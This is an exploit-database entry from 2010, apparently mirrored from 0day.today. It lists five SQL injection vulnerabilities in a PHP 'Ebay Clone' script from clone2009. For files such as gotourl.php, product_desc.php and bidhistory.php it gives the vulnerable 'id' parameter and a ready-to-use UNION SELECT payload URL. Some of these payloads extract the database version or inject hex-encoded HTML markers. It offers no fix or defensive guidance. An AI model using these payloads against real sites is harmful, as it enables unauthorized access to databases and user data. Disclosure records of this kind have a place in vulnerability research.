Ebay Clone from clone2009 SQL Injection Vulnerabilities

2010-01-16T00:00:00
ID 1337DAY-ID-10684
Type zdt
Reporter n/a
Modified 2010-01-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================
Ebay Clone from clone2009 SQL Injection Vulnerabilities
=======================================================

/*
 
Name : Ebay Clone from (clone2009.com<http://clone2009.com>)
Site : http://www.clone2009.com/
 
Author : Hamza 'MizoZ' N.
 
Greetz : Zuka , GreyMen :)
 
*/
 
# 1st SQL injection :
 
File : gotourl.php , Get : id
 
[HOST]/[PATH]/gotourl.php?id=-1+union+select+version()--
 
=> You will be redirected to [HOST]/[PATH]/[VERSION]
 
Demo : http://server/gotourl.php?id=0+union+select+version()--
 
# 2nd SQL Injection :
 
File : product_desc.php  , Get : id
 
[HOST]/[PATH]/product_desc.php?id=[INJECTION]
 
Demo : http://server/product_desc.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
 
# 3th SQL Injection :
 
File : view_items.php , Get : id
 
[HOST]/[PATH]/view_items.php?id=[INJECTION]
 
Demo : http://server/view_items.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c666f6e7420636f6c6f723d22726564223e4845524520494e4a454354494f4e3c2f666f6e743e,12,13,14,15,16,17,18--
 
# 4th SQL Injection :
 
File : bidhistory.php , Get : id
 
[HOST]/[PATH]/bidhistory.php?id=[INJECTION]
 
Demo : http://server/bidhistory.php?id=-45+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--
 
# 5th SQL Injection :
 
FIle : view_feedback.php , Get : id
 
[HOST]/[PATH]/view_feedback.php?id=[INJECTION]
 
Demo : http://server/view_feedback.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c68313e484552453c2f68313e,12,13,14,15,16,17,18--



#  0day.today [2018-01-04]  #